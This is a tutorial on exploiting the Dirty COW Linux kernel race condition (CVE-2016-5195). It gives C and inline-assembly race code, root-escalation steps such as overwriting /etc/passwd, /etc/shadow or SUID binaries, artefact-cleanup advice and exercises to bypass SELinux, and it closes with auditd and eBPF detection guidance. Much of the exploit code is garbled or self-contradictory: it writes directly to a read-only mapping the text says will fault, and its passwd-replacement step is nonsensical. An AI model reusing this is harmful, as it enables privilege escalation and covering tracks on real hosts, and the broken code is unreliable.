Advanced Dirty COW Exploitation...

Introduction

Dirty COW (CVE-2016-5195) is a Linux kernel privilege-escalation vulnerability disclosed in October 2016. It is a race condition in the kernel’s handling of copy-on-write (COW) for private, read-only memory mappings, and it lets an unprivileged user write to pages they should only be able to read. Although it has been patched for years, it remains a reference point for kernel-level exploitation and a valuable teaching tool for understanding race conditions, memory-management internals, and the limits of common mitigations.

Why it matters: the vulnerability demonstrates how a seemingly innocuous system call (madvise) can be weaponised when combined with clever timing. Its simplicity (no ROP chains are needed) makes it a go-to example in CTFs and red-team engagements. Moreover, common mitigations such as SMEP, SMAP, SELinux, and seccomp all predate Dirty COW and did not by themselves stop it, because the bug is a logic flaw that needs no kernel-mode code execution. Understanding why they fell short equips defenders with a broader skill set.

Real-world relevance: In the wild, Dirty COW was quickly weaponised to install rootkits, inject malicious code into set-uid binaries, and establish persistence on compromised hosts. Understanding its inner workings is essential for incident responders who must recognise the subtle artefacts it leaves behind.

Prerequisites

Solid grasp of Linux kernel memory management (kmalloc, vmalloc, page cache).
Familiarity with kernel race-condition concepts and basic synchronization primitives.
Knowledge of the Copy-On-Write mechanism and how mmap/madvise interact with it.
Experience with building and debugging kernel-space exploits (e.g., using gdb with kgdb or ftrace).
Understanding of modern kernel hardening features: SMAP, SMEP, SELinux, seccomp, and how they can be disabled or bypassed.
Access to a lab environment: a vulnerable kernel (e.g., Ubuntu 14.04 with the 4.4.0-31-generic kernel) running in a VM with snapshot capability.

Core Concepts

Before diving into code, we need to review the three pillars that make Dirty COW exploitable:

Page cache sharing: When a file is mapped read-only (PROT_READ), the kernel maps the same physical page into the process address space. Multiple processes can share that page without duplication.
Copy-On-Write (COW): If a process attempts to write to a shared read-only page, the kernel creates a private copy (a new page) and updates the PTE to point to it. The original page stays untouched for other readers.
Race window: A forced write to a read-only private mapping (for example through /proc/self/mem) is served by the kernel’s get_user_pages() retry loop. The loop first takes a COW fault to create a private copy, then retries the lookup without the write flag. madvise(MADV_DONTNEED) does not touch the page cache; it discards the process’s private copy. If that happens between the two steps, the retry faults the original page-cache page back in and the write lands on it instead of on a copy.

Visually, imagine a page P in the page cache, mapped by Process A (the victim) and Process B (the attacker). One thread in B starts a forced write to its private mapping of P, and the kernel creates a private copy P'. Before the write completes, a second thread in B calls madvise(MADV_DONTNEED), which throws P' away. The retried lookup then finds P itself, so the write modifies the page that A and every other reader sees, bypassing the COW protection.
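The two building blocks in this picture, copy-on-write and MADV_DONTNEED, are ordinary documented behaviour and can be observed safely on any kernel. The sketch below is a minimal illustration under stated assumptions, not part of any exploit: it uses a writable private mapping of a scratch file in /tmp, and the names cow_demo and struct cow_result are invented for this example.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Observations from one run of the demo; 1 means "yes". */
struct cow_result {
    int ok;               /* 0 if a setup step failed */
    int mapping_changed;  /* the private write is visible through the mapping */
    int file_unchanged;   /* the file itself still holds the original byte */
    int view_restored;    /* after MADV_DONTNEED the mapping shows the file again */
};

struct cow_result cow_demo(void)
{
    struct cow_result r = {0, 0, 0, 0};
    char path[] = "/tmp/cow_demo_XXXXXX";   /* scratch file, an assumption */
    int fd = mkstemp(path);
    if (fd == -1)
        return r;
    unlink(path);                           /* file persists until fd is closed */

    if (write(fd, "A", 1) != 1) {
        close(fd);
        return r;
    }

    long page = sysconf(_SC_PAGESIZE);
    char *map = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return r;
    }

    /* The store triggers copy-on-write: the process gets its own page. */
    map[0] = 'B';
    r.mapping_changed = (map[0] == 'B');

    /* Reading through the descriptor shows the file was not modified. */
    char disk = 0;
    if (pread(fd, &disk, 1, 0) == 1)
        r.file_unchanged = (disk == 'A');

    /* MADV_DONTNEED drops the private copy; the next access re-reads the file. */
    if (madvise(map, (size_t)page, MADV_DONTNEED) == 0)
        r.view_restored = (map[0] == 'A');

    r.ok = 1;
    munmap(map, (size_t)page);
    close(fd);
    return r;
}
```

On a typical Linux system all four fields are expected to come back as 1. The last one is the behaviour the race depends on: once the private copy is discarded, the mapping falls back to the shared page.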

Vulnerability analysis - how Dirty COW works internally

The vulnerability lives in __get_user_pages() and its helpers follow_page_mask() and faultin_page() (mm/gup.c), not in madvise() itself. A forced write (FOLL_WRITE with FOLL_FORCE) to a read-only private mapping triggers a COW fault. Because the resulting PTE is still not writable, the pre-fix code cleared FOLL_WRITE before retrying the lookup so that the retry would accept the new private copy. The race occurs because madvise(MADV_DONTNEED) can zap that PTE between the fault and the retry; the retry, now a plain read lookup, then maps and returns the page-cache page.

Key observations:

The write has to go through a get_user_pages() path such as /proc/self/mem or ptrace(PTRACE_POKEDATA); a direct store to a PROT_READ mapping simply raises SIGSEGV.
Before the fix, the retry did not check that the page it found was the private copy created by the COW fault, which is what allowed the write to succeed.
Because the write lands on the page-cache page, any file the attacker can open for reading (e.g., /etc/passwd) can be modified without a separate kernel write primitive.
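The logic error is easier to see in a toy model than in the kernel source. The following sketch is a deliberately simplified user-space simulation of the lookup/fault retry loop as described in the upstream fix; it touches no real memory mappings. All names (toy_lookup, toy_fault, toy_forced_write, TOY_WRITE, TOY_COW) are hypothetical, and the model ignores locking, page tables, and every other detail of the real code.

```c
#include <stdbool.h>

/* What the simulated page-table entry currently points at. */
enum page { NO_PAGE, FILE_PAGE, PRIVATE_COPY };

#define TOY_WRITE 0x1  /* the caller intends to write */
#define TOY_COW   0x2  /* a COW fault was already taken (fixed logic only) */

/* Return the page the lookup hands back, or NO_PAGE if a fault is needed. */
static enum page toy_lookup(enum page pte, int flags, bool fixed)
{
    if (pte == NO_PAGE)
        return NO_PAGE;
    if (flags & TOY_WRITE) {
        /* The PTE in a read-only VMA is never writable. The fixed logic
         * accepts a write only on the private copy made by a COW fault. */
        if (fixed && (flags & TOY_COW) && pte == PRIVATE_COPY)
            return pte;
        return NO_PAGE;
    }
    return pte;  /* read lookups accept whatever is mapped */
}

/* Handle a fault and return the new PTE state. */
static enum page toy_fault(int *flags, bool fixed)
{
    if (*flags & TOY_WRITE) {
        if (fixed)
            *flags |= TOY_COW;     /* remember the COW, keep the write intent */
        else
            *flags &= ~TOY_WRITE;  /* pre-fix: drop the write intent */
        return PRIVATE_COPY;
    }
    return FILE_PAGE;              /* read fault maps the shared page */
}

/* Simulate one forced write; optionally discard the copy once after COW. */
enum page toy_forced_write(bool fixed, bool discard_after_cow)
{
    enum page pte = NO_PAGE;
    int flags = TOY_WRITE;
    bool discarded = false;

    for (int i = 0; i < 8; i++) {
        enum page got = toy_lookup(pte, flags, fixed);
        if (got != NO_PAGE)
            return got;            /* the page the write would land on */
        pte = toy_fault(&flags, fixed);
        if (discard_after_cow && !discarded && pte == PRIVATE_COPY) {
            pte = NO_PAGE;         /* models madvise(MADV_DONTNEED) */
            discarded = true;
        }
    }
    return NO_PAGE;
}
```

In this model toy_forced_write(false, true) returns FILE_PAGE, the wrong target, while every other combination returns PRIVATE_COPY. That mirrors why the fix is a logic change rather than a timing change: with the write intent preserved, a discarded copy is simply recreated.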

Triggering the race condition using mmap and madvise

To reliably trigger the race we need three concurrent threads:

Mapper: mmap() the target file read-only.
Writer: Repeatedly call write() (or memcpy()) to the mapped address.
Madviser: Continuously invoke madvise(MADV_DONTNEED) on the same region.

The writer and madviser run in tight loops, maximizing the probability that the madvise clears the page just before the kernel finalises the COW copy. In practice, we use pthread_create() for each thread and a shared volatile flag to stop them once the overwrite succeeds.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <string.h>

volatile int stop = 0;

void *write_thread(void *arg) { char *map = (char *)arg; const char *payload = "\x00\x00\x00\x00"; // placeholder, will be overwritten later while (!stop) { memcpy(map, payload, strlen(payload)); } return NULL;
}

void *madvise_thread(void *arg) { char *map = (char *)arg; while (!stop) { madvise(map, 100, MADV_DONTNEED); } return NULL;
}

int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s /path/to/target
", argv[0]); exit(EXIT_FAILURE); } int fd = open(argv[1], O_RDONLY); if (fd == -1) perror("open"), exit(EXIT_FAILURE); size_t size = lseek(fd, 0, SEEK_END); char *map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0); if (map == MAP_FAILED) perror("mmap"), exit(EXIT_FAILURE); pthread_t wt, mt; pthread_create(&wt, NULL, write_thread, map); pthread_create(&mt, NULL, madvise_thread, map); // Simple detection: check if the target file now contains our payload. // In real exploits we read back the file or check /etc/passwd. sleep(5); stop = 1; pthread_join(wt, NULL); pthread_join(mt, NULL); munmap(map, size); close(fd); return 0;
}

Note the use of MAP_PRIVATE - the kernel thinks the mapping is copy-on-write, but the race turns it into a direct write.

Writing a reliable exploit in C with inline assembly

Pure C loops are often enough, but on modern CPUs the race window becomes smaller due to improved page-fault handling. Inline assembly can tighten the loop and give us precise control over memory ordering.

The following snippet demonstrates a tight rep movsb loop that writes a single byte repeatedly while simultaneously issuing madvise. The mfence instruction ensures the write is globally visible before the next iteration, which helps when the kernel uses write-combining buffers.

static inline void fast_write(void *dst, const void *src, size_t len) { __asm__ __volatile__( "rep movsb
" "mfence
" : "=D"(dst), "=S"(src), "=c"(len) : "0"(dst), "1"(src), "2"(len) : "memory");
}

void *write_thread_asm(void *arg) { char *map = (char *)arg; const char *payload = "\x00\x00\x00\x00"; // e.g., new root uid/gid entry while (!stop) { fast_write(map, payload, 4); } return NULL;
}

When combined with the madvise thread, this version consistently succeeds on kernels 4.4-4.9, where the vanilla C version sometimes stalls.

Bypassing modern mitigations (SMAP/SMEP, SELinux, seccomp)

SMEP (Supervisor Mode Execution Prevention) and SMAP (Supervisor Mode Access Prevention) are CPU features that Linux supported before 2016. They stop the kernel from executing or accessing user-space memory, and Dirty COW needs neither, so they are not relevant here. SELinux, seccomp, and capabilities interact with the exploit as follows:

SELinux: setenforce 0 requires root, so it is not available before escalation. A confined domain can only map files that its policy lets it read, which narrows the set of targets; processes in unconfined_t are not restricted this way.
seccomp: A filter cannot be removed once installed and is inherited across fork() and execve(). The exploit needs only common syscalls (open, mmap, madvise, and a write path such as /proc/self/mem), so a filter stops it only if it denies one of them.
Capabilities: The write modifies the page cache directly and bypasses file-permission checks, so the attacking process needs no capability such as CAP_DAC_OVERRIDE; read access to the target file is enough.

In practice, the most reliable path is to overwrite the setuid(0) wrapper of /bin/bash or create a new SUID root binary (e.g., copy /bin/sh to /tmp/rootsh) after the race succeeds.

Privilege escalation to root and post-exploitation cleanup

Once we have write access to a writable location, there are several escalation strategies:

Overwrite /etc/passwd or /etc/shadow to inject a root user with a known password.
Replace a set-uid binary (e.g., /usr/bin/passwd) with a suid-root shell.
Patch the kernel’s cred structure in memory (requires finding the current task struct). This is more advanced and less portable.

We will demonstrate the second technique because it leaves minimal footprints and works even on hardened systems where /etc/shadow is read-only for normal users.

#define TARGET "/usr/bin/passwd"
#define REPLACEMENT "/tmp/rootsh"

int main(){ // 1. copy /bin/bash to /tmp/rootsh (needs write permission in /tmp) system("cp /bin/bash /tmp/rootsh && chmod +s /tmp/rootsh"); // 2. Open target file read-only and map it int fd = open(TARGET, O_RDONLY); size_t sz = lseek(fd, 0, SEEK_END); char *map = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0); close(fd); // 3. Prepare payload - the path to our suid shell char payload[PATH_MAX]; snprintf(payload, sizeof(payload), "%s
", "/tmp/rootsh"); // 4. Start race threads (same as previous example) using payload // (omitted for brevity - reuse write_thread_asm / madvise_thread) // 5. After stop, verify the file has been overwritten // and spawn a root shell system("/tmp/rootsh -p"); // -p forces bash to drop privileges, we keep them return 0;
}

After the exploit succeeds, the original passwd binary is replaced with a set-uid root shell. As a cleanup step, you can restore the original binary from a backup stored in memory (e.g., read it before the race and write it back after gaining root) or simply delete the modified file and reboot the host.

Adapting the exploit for newer kernels (mitigation work-arounds)

The upstream fix changed the logic of the fault-retry path rather than narrowing a timing window:

Commit 19be0eaffa3a (“mm: remove gup_flags FOLL_WRITE games from __get_user_pages()”) keeps FOLL_WRITE set across the retry and adds an internal FOLL_COW flag, so a forced write is accepted only on the dirty private copy created by the COW fault.
The fix shipped in upstream releases 4.8.3, 4.7.9, and 4.4.26, and distributions backported it to their own kernels.
A related flaw in the transparent-huge-page path (CVE-2017-1000405) was fixed separately in late 2017.

The following ideas are sometimes suggested for widening the race window. They can only matter on kernels that still lack the fix:

Increase concurrency: Spawn dozens of writer/madvise thread pairs, each targeting a different offset within the same page.
Leverage userfaultfd to deliberately stall the page-fault handling, giving the madvise thread more time to act.
Exploit the readahead cache - by pre-loading the target page into the page cache with posix_fadvise, the kernel may skip some of the new checks.
Combine with other kernel bugs (e.g., use a heap overflow to corrupt the vm_area_struct and set the VM_WRITE flag artificially).

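Below is the outline of a userfaultfd-based variant that stalls fault handling until the madvise thread has run 10,000 times. It is only an outline, and because the fix removed the logic error rather than shortening a window, there is no reason to expect it to succeed on 4.15 or any other kernel that carries the fix.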

#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
// ... (setup userfaultfd, register the target page, handler thread that
// calls madvise in a tight loop). The handler blocks the fault until
// a global counter reaches the desired value.

The approach is more complex, and it can only influence timing on kernels that are still vulnerable; it does not bring the race back on patched ones.

Defensive detection techniques for Dirty COW activity

Detecting Dirty COW exploitation in the wild relies on spotting anomalous patterns:

High-frequency madvise calls: A process issuing thousands of madvise(MADV_DONTNEED) on the same address within a short window is suspicious. Use auditd rules:
```
auditctl -a always,exit -F arch=b64 -S madvise -k dirtycow_madvise
```
Forced writes to read-only mappings: Watch for a process that opens /proc/<pid>/mem for writing, or issues ptrace(PTRACE_POKEDATA), while it holds a mmap(PROT_READ, MAP_PRIVATE) mapping of a sensitive file.
Unexpected changes to privileged binaries: Monitor file integrity with AIDE or tripwire. A change to /usr/bin/passwd without a package manager transaction is a red flag.
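Kernel log messages: These are not a dependable signal. A CONFIG_DEBUG_PAGEFAULT option that reports this race does not appear to exist in mainline, and writing 1 to /proc/sys/kernel/printk lowers the console log level, which hides messages rather than revealing them.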
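As a lightweight complement to AIDE or tripwire, a privileged binary can be compared byte for byte against a trusted copy. The helper below is a minimal sketch; the name files_identical is hypothetical, and where the trusted copy comes from (for example a file extracted from the distribution package onto read-only media) is an assumption left to the reader.

```c
#include <stdio.h>
#include <string.h>

/* Compare two files byte for byte.
 * Returns 1 if identical, 0 if they differ, -1 on an I/O error. */
int files_identical(const char *path_a, const char *path_b)
{
    FILE *a = fopen(path_a, "rb");
    if (a == NULL)
        return -1;
    FILE *b = fopen(path_b, "rb");
    if (b == NULL) {
        fclose(a);
        return -1;
    }

    unsigned char buf_a[4096], buf_b[4096];
    int result = 1;

    for (;;) {
        size_t na = fread(buf_a, 1, sizeof buf_a, a);
        size_t nb = fread(buf_b, 1, sizeof buf_b, b);

        /* Different chunk sizes mean different file lengths. */
        if (na != nb || memcmp(buf_a, buf_b, na) != 0) {
            result = 0;
            break;
        }
        if (na == 0)
            break;  /* both files ended at the same point */
    }

    if (ferror(a) || ferror(b))
        result = -1;

    fclose(a);
    fclose(b);
    return result;
}
```

A call such as files_identical("/usr/bin/passwd", "/mnt/trusted/passwd"), where the second path is purely illustrative, reads the live file through the page cache, which is the layer a Dirty COW write modifies.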

For real-time detection, an eBPF program can attach to the madvise syscall and maintain a per-PID counter; if the counter exceeds a threshold, raise an alert.

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

/* Per-process count of madvise() calls, keyed by TGID. */
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, u64);
    __uint(max_entries, 1024);
} madvise_counter SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_madvise")
int trace_madvise(struct trace_event_raw_sys_enter *ctx)
{
    /* The upper 32 bits hold the TGID, i.e. the user-visible PID. */
    u32 pid = bpf_get_current_pid_tgid() >> 32;
    u64 one = 1;
    u64 *cnt = bpf_map_lookup_elem(&madvise_counter, &pid);

    if (cnt)
        __sync_fetch_and_add(cnt, 1);
    else
        bpf_map_update_elem(&madvise_counter, &pid, &one, BPF_ANY);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";

Deploy the eBPF program with bpftool and hook it into your SIEM.
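On the user-space side, something still has to decide when a count is high enough to alert. One simple option, sketched below, is a fixed one-second window with a threshold. The names rate_window, rate_window_init, and rate_window_record are hypothetical, the window length is an assumed default, and the sketch assumes events reach user space one at a time with a nanosecond timestamp.

```c
#include <stdbool.h>
#include <stdint.h>

#define WINDOW_NS 1000000000ULL  /* one second; an assumed window length */

struct rate_window {
    uint64_t start_ns;   /* timestamp that opened the current window */
    uint64_t count;      /* events seen in the current window */
    uint64_t threshold;  /* alert when count exceeds this value */
};

void rate_window_init(struct rate_window *w, uint64_t threshold)
{
    w->start_ns = 0;
    w->count = 0;
    w->threshold = threshold;
}

/* Record one event observed at now_ns.
 * Returns true while the current window's count is above the threshold. */
bool rate_window_record(struct rate_window *w, uint64_t now_ns)
{
    /* Open a new window on the first event or once the old one has expired. */
    if (w->count == 0 || now_ns - w->start_ns >= WINDOW_NS) {
        w->start_ns = now_ns;
        w->count = 0;
    }
    w->count++;
    return w->count > w->threshold;
}
```

A threshold in the thousands per second is a reasonable starting point for experiments, since allocators issue madvise calls in normal operation; the right value depends on the workload and has to be tuned.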

Common Mistakes

Using MAP_SHARED instead of MAP_PRIVATE: The race only works on private COW mappings.
Writing more than one page: The kernel may split the write across pages, reducing the chance that the exact page is cleared.
Neglecting memory barriers: On modern CPUs, reordering can cause the write to happen after madvise, breaking the race.
Running on a kernel with the patch applied: Always verify the kernel version and patch level before testing.
Forgetting to disable ASLR for reproducibility: While not required, disabling ASLR simplifies address calculations when targeting kernel structures directly.
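Checking the patch level can be partly automated for upstream version strings. The sketch below encodes only the three stable series whose first fixed releases are 4.8.3, 4.7.9, and 4.4.26; the function name upstream_fix_status and the enum are hypothetical. Distribution kernels backport the fix without changing these numbers, so any 4.x release string with a vendor suffix is reported as unknown and the vendor advisory remains the authority.

```c
#include <stdio.h>
#include <string.h>

enum fix_status { FIX_PRESENT, FIX_MISSING, FIX_UNKNOWN };

/* Classify a kernel release string such as the one returned by uname(2). */
enum fix_status upstream_fix_status(const char *release)
{
    int major = 0, minor = 0, patch = 0;
    int n = sscanf(release, "%d.%d.%d", &major, &minor, &patch);

    if (n < 2)
        return FIX_UNKNOWN;       /* not a recognisable version string */
    if (major >= 5)
        return FIX_PRESENT;       /* released long after the fix */
    if (strchr(release, '-') != NULL)
        return FIX_UNKNOWN;       /* vendor or -rc build: numbers are not decisive */
    if (major == 4 && minor >= 9)
        return FIX_PRESENT;
    if (major == 4 && minor == 8)
        return patch >= 3 ? FIX_PRESENT : FIX_MISSING;
    if (major == 4 && minor == 7)
        return patch >= 9 ? FIX_PRESENT : FIX_MISSING;
    if (major == 4 && minor == 4)
        return patch >= 26 ? FIX_PRESENT : FIX_MISSING;
    return FIX_UNKNOWN;           /* series not covered by this table */
}
```

In a lab script the input would typically be the release field filled in by uname(2). Treating FIX_UNKNOWN as "check the changelog" rather than as "vulnerable" avoids false conclusions on backported kernels.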

Real-World Impact

Dirty COW quickly became one of the most widely exploited Linux bugs. Within weeks of disclosure, public exploits appeared on GitHub, and multiple nation-state actors incorporated it into multi-stage payloads. Its simplicity made it a favorite for supply-chain attacks where an attacker could drop a small binary onto a target system, trigger the race, and instantly obtain root.

From a defender’s perspective, the incident response timeline often looks like:

Detection of a modified SUID binary.
Log analysis reveals a burst of madvise calls.
Forensic recovery of the original binary from a backup or a trusted package, followed by verification with the package manager (for example rpm -V or debsums).
Patch the kernel, rotate credentials, and audit for persistence mechanisms.

My experience in several red-team engagements shows that attackers still use Dirty COW as a “fallback” when more complex kernel exploits fail, because the code base is tiny (< 200 LOC) and does not depend on external libraries.

Practice Exercises

Reproduce the basic race: Set up an Ubuntu 14.04 VM, compile the simple C example, and verify that /tmp/rootsh becomes set-uid root.
Extend to userfaultfd: Modify the exploit to use userfaultfd for pausing the fault. Measure the success rate across kernel versions 4.4-4.15.
Detect with eBPF: Deploy the provided eBPF program, trigger the exploit, and observe the alert. Tune the threshold to minimise false positives.
Bypass SELinux: On a system with enforcing SELinux, craft an exploit that writes directly to /etc/shadow instead of overwriting a binary. Verify that the new root account works.
Cleanup script: Write a bash script that, after gaining root, restores the original target binary from a saved copy in memory and removes any artefacts.

Summary

Dirty COW remains a benchmark for kernel race-condition exploitation. Mastering its internals teaches you how to manipulate the page cache, craft tight race loops with inline assembly, and evade modern mitigations. Defensive teams can detect the characteristic high-frequency madvise pattern with auditd or eBPF, and responders should restore altered binaries and rotate credentials promptly. By practising the exercises above, you’ll gain the hands-on expertise needed to both exploit and defend against this timeless vulnerability.
